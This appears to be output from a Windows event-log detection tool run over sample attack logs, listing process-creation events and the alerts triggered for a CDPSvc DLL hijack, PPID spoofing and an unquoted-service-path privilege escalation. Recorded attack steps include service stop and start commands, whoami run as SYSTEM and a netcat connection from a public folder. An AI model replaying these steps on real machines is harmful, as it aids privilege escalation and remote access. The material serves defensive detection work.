2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc  stop CDPSvc  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management  :  Command: sc  query CDPSvc  :  Path: C:\Windows\System32\sc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications  :  Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net  start CDPSvc  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\net1  start CDPSvc  :  Path: C:\Windows\System32\net1.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: net  start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: nc.exe  127.0.0.1 1337  :  Path: C:\Users\Public\Tools\nc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe  :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe *  :  Path: C:\Windows\System32\autochk.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe  :  Path: C:\Windows\System32\wininit.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe""  :  Path: C:\Windows\System32\dwm.exe  :  User: Window Manager\DWM-1  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0  :  Path: C:\Windows\System32\upfc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe  :  Path: C:\Windows\System32\dxgiadaptercache.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
